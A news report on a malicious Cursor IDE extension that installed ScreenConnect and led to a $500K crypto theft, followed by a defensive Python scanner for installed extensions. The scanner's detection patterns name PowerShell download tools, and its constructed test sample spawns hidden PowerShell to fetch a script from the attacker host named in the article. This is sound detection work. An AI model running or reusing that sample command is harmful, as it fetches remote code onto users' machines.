
Malicious VSCode extension in Cursor IDE led to $500K crypto theft


A fake extension for the Cursor AI IDE code editor infected devices with remote access tools and infostealers, which, in one case, led to the theft of $500,000 in cryptocurrency from a Russian crypto developer.

Cursor AI IDE is an AI-powered development environment based on Microsoft's Visual Studio Code. It includes support for Open VSX, an alternative to the Visual Studio Marketplace, which allows you to install VSCode-compatible extensions to expand the software's functionality.

Kaspersky reports that they were called in to investigate a security incident in which a Russian developer working in cryptocurrency reported that $500,000 in crypto was stolen from his computer. The machine had no antivirus software installed, but it was believed to be clean.

Georgy Kucherin, a security researcher for Kaspersky, received an image of the device's hard drive, and after analyzing it, discovered a malicious JavaScript file named extension.js located in the .cursor/extensions directory.

The extension was named "Solidity Language" and was published on the Open VSX registry, claiming to be a syntax highlighting tool for working with Ethereum smart contracts.

Although the plugin impersonated the legitimate Solidity syntax highlighting extension, it actually executed a PowerShell script from a remote host at angelic[.]su to download additional malicious payloads.

[Figure: Extension.js file executing remote PowerShell script. Source: Kaspersky]

The remote PowerShell script checked if the remote management tool ScreenConnect was already installed, and if not, executed another script to install it.

Once ScreenConnect was installed, the threat actors gained full remote access to the developer's computer. Using ScreenConnect, the threat actor uploaded and executed VBScript files that were used to download additional payloads to the device.
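The behaviour described above (an extension's extension.js that spawns PowerShell to fetch a script from a remote host, which then stages a remote management tool) is what a triage script can look for across a user's installed extensions. The following Python is an added example written for this article; it is not Kaspersky's tooling or the actual extension.js. It walks an extensions directory in the layout Cursor and VSCode use (one folder per extension, with the extension's JavaScript inside), flags JavaScript that imports child_process together with PowerShell or download indicators, and matches referenced URL hosts against an indicator set seeded with the angelic[.]su host named in the article. The two sample extensions it scans are constructed inline for the demonstration; the "bad" sample only imitates the pattern and downloads nothing.

```python
import re
import tempfile
from pathlib import Path

# Host named in the article as the source of the remote PowerShell script.
# Extend this set from your own threat intel; matching is exact on the URL host.
KNOWN_BAD_HOSTS = {"angelic.su"}

# Behavioural indicators: a syntax-highlighting extension has no reason to spawn
# PowerShell, hide its window, or pull content from the network.
PATTERNS = {
    "child_process": re.compile(r"""require\(\s*['"]child_process['"]\s*\)"""),
    "powershell": re.compile(r"\bpowershell(\.exe)?\b", re.I),
    "remote_fetch": re.compile(r"\b(Invoke-WebRequest|iwr|Invoke-Expression|iex|DownloadString|DownloadFile)\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


def analyze_js(source: str) -> dict:
    """Return indicator hits, referenced hosts and a verdict for one JavaScript file."""
    hits = sorted(name for name, rx in PATTERNS.items() if rx.search(source))
    hosts = sorted({h.lower() for h in URL_HOST_RE.findall(source)})
    bad_hosts = [h for h in hosts if h in KNOWN_BAD_HOSTS]
    if bad_hosts:
        verdict = "known_bad"
    elif "child_process" in hits and ("powershell" in hits or "remote_fetch" in hits):
        verdict = "suspicious"
    elif hits:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "hits": hits, "hosts": hosts, "bad_hosts": bad_hosts}


def scan_extensions(root: Path) -> list:
    """Walk <root>/<publisher.name-version>/ (the layout of ~/.cursor/extensions and
    ~/.vscode/extensions) and analyze every .js file outside node_modules."""
    findings = []
    for ext_dir in sorted(p for p in root.iterdir() if p.is_dir()):
        for js in sorted(ext_dir.rglob("*.js")):
            if "node_modules" in js.parts:
                continue
            result = analyze_js(js.read_text(encoding="utf-8", errors="replace"))
            if result["verdict"] != "clean":
                findings.append({"extension": ext_dir.name, "file": str(js.relative_to(root)), **result})
    return findings


# Constructed samples for an offline demonstration. The "bad" one imitates the
# behaviour the article describes (spawn PowerShell to fetch a remote script);
# it is not the real extension.js and the path below is a placeholder.
BENIGN_EXTENSION_JS = """
const vscode = require('vscode');
function activate(context) {
  context.subscriptions.push(
    vscode.commands.registerCommand('demo.hello', () => vscode.window.showInformationMessage('hi')));
}
module.exports = { activate };
"""

CONSTRUCTED_BAD_EXTENSION_JS = """
const { exec } = require('child_process');
function activate() {
  exec('powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest https://angelic.su/CONSTRUCTED_PATH"');
}
module.exports = { activate };
"""


def demo() -> list:
    """Build a throwaway extensions directory holding both samples and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        good = root / "good-publisher.highlighter-1.0.0"
        good.mkdir()
        (good / "extension.js").write_text(BENIGN_EXTENSION_JS)
        bad = root / "fake-publisher.solidity-language-0.0.1"
        bad.mkdir()
        (bad / "extension.js").write_text(CONSTRUCTED_BAD_EXTENSION_JS)
        return scan_extensions(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['verdict']:10} {f['file']}  hits={f['hits']}  bad_hosts={f['bad_hosts']}")
```

To run it against a real machine, call scan_extensions(Path.home() / ".cursor" / "extensions") instead of demo(). Static string matching is a first pass only: obfuscated or dynamically built command lines will not match, so treat a "clean" result as "nothing obvious" and pair this with the host-level checks the article implies, such as looking for an unexpected ScreenConnect installation.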
